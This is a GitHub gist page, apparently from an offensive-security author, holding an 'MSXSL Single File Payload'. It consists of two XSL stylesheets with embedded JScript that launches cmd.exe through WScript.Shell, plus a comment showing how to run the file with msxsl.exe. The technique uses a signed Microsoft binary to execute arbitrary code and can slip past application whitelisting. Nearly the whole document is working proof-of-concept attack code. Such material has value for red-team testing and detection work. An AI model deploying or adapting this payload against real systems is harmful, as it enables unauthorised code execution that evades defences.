Skip to content

Instantly share code, notes, and snippets.

@its-a-feature
Created March 17, 2018 22:03
Show Gist options
  • Save its-a-feature/3b532896518015ca501d15ba6b55a123 to your computer and use it in GitHub Desktop.
Save its-a-feature/3b532896518015ca501d15ba6b55a123 to your computer and use it in GitHub Desktop.
MSXSL Single File Payload
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
<?xml version='1.0'?>
<!-- msxsl.exe poc.xml poc.xml -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
<template match="/*">
<apply-templates
select="*"/>
</template>
</stylesheet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment